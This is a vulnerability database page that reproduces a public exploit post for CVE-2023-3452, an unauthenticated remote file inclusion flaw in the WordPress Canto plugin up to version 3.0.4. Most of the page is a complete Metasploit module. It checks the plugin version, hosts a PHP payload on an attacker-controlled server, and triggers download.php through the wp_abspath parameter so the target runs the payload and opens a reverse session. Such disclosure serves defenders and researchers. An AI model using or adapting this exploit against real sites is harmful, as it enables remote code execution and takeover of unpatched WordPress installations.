Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 WordPress Canto 3.0.4 Remote File Inclusion

🗓️ 13 Mar 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 86 Views

RFI in WordPress Canto plugin version 3.0.4 or earlier leads to remote code execution via download.php.

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Wordpress Canto Plugin < 3.0.5 - Remote File Inclusion and Remote Code Execution Exploit
27 Feb 202400:00
zdt
GithubExploit		Exploit for CVE-2023-3452
5 Nov 202316:33
githubexploit
GithubExploit		Exploit for CVE-2023-3452
3 Mar 202610:05
githubexploit
GithubExploit		Exploit for CVE-2023-3452
6 Mar 202602:20
githubexploit
Circl		CVE-2023-3452
12 Aug 202307:17
circl
CNNVD		WordPress plugin Canto security vulnerability
12 Aug 202300:00
cnnvd
CVE		CVE-2023-3452
12 Aug 202302:05
cve
Cvelist		CVE-2023-3452 Canto <= 3.0.4 - Unauthenticated Remote File Inclusion
12 Aug 202302:05
cvelist
Exploit DB		Wordpress Plugin Canto &lt; 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)
27 Feb 202400:00
exploitdb
Nuclei		WordPress Canto Plugin <= 3.0.4 - File Inclusion
8 Jun 202604:09
nuclei
Rows per page
=============================================================================================================================================
    | # Title     : WordPress Canto Plugin ≤ 3.0.4 Unauthenticated Remote File Inclusion Leading to RCE                                         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://wordpress.com/plugins/canto                                                                                         |
    =============================================================================================================================================
    
    [+] Summary    : This Metasploit module targets a Remote File Inclusion (RFI) vulnerability in the WordPress Canto Plugin versions 3.0.4 and earlier.
                     The issue resides in the download.php file, where the wp_abspath parameter is not properly validated before being used in a file inclusion context. 
                     An unauthenticated attacker can supply a remote URL, causing the application to include and execute arbitrary PHP code.
    
    The module works by:
    
    Verifying the installed plugin version via readme.txt.
    
    Starting a local HTTP server to host a malicious PHP payload.
    
    Triggering the vulnerable download.php endpoint with a crafted wp_abspath parameter pointing to the attacker-controlled payload.
    
    Establishing a reverse session once the remote server includes and executes the payload.
    
    Successful exploitation results in remote code execution with the privileges of the web server process
    			  
    [+] POC   :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::Remote::HttpServer
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'WordPress Canto Plugin <= 3.0.4 - Unauthenticated RFI to RCE',
          'Description'    => %q{
            This module exploits a Remote File Inclusion (RFI) vulnerability in the 
            WordPress Canto plugin (<= 3.0.4). The issue exists in download.php 
            via the 'wp_abspath' parameter.
          },
          'Author'         => [ 'indoushka' ], 
          'License'        => MSF_LICENSE,
          'References'     => [ [ 'CVE', '2023-3452' ] ],
          'Payload'        => { 'BadChars' => "\x00" },
          'Platform'       => 'php',
          'Arch'           => ARCH_PHP,
          'Targets'        => [ ['Canto <= 3.0.4', {}] ],
          'DisclosureDate' => '2023-06-12',
          'DefaultTarget'  => 0,
          'Notes'          => {
            'Stability'   => [ CRASH_SAFE ],
            'SideEffects' => [ IOC_IN_LOGS ],
            'Reliability' => [ REPEATABLE_SESSION ]
          }))
    
        register_options([
          OptString.new('TARGETURI', [true, 'The base path to WordPress', '/'])
        ])
      end
    
      def check
        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => normalize_uri(target_uri.path, 'wp-content/plugins/canto/readme.txt')
        })
    
        return Exploit::CheckCode::Unknown("Target is unreachable.") unless res
    
        if res.code == 200 && res.body.include?('Canto')
          version = res.body.match(/Stable tag:\s*([\d\.]+)/)
          if version
            v_str = version[1]
            if Rex::Version.new(v_str) <= Rex::Version.new('3.0.4')
              return Exploit::CheckCode::Vulnerable("Canto version #{v_str} detected.")
            end
            return Exploit::CheckCode::Safe("Canto version #{v_str} is not vulnerable.")
          end
        end
        Exploit::CheckCode::Safe
      end
    
      def on_request_uri(cli, _request)
        print_good("Target reached out! Sending PHP payload...")
        send_response(cli, payload.encoded, { 'Content-Type' => 'application/x-httpd-php' })
      end
    
      def exploit
        start_service
        
        payload_url = get_uri
        target_path = normalize_uri(target_uri.path, 'wp-content/plugins/canto/includes/lib/download.php')
        
        print_status("Triggering RFI at #{target_path}")
        print_status("Hosting payload at #{payload_url}")
        res = send_request_cgi({
          'method'   => 'GET',
          'uri'      => target_path,
          'vars_get' => {
            'wp_abspath' => payload_url
          }
        }, 5) 
    
        if res
          print_status("Server responded with status: #{res.code}")
        else
          print_status("No response from server (this is common for RFI), checking for session...")
        end
        handler
      end
    end
    
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Mar 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.19.8
EPSS0.87115
SSVC
wordpress cantoremote file inclusionremote code executionunauthenticated accessdownload file endpoint
86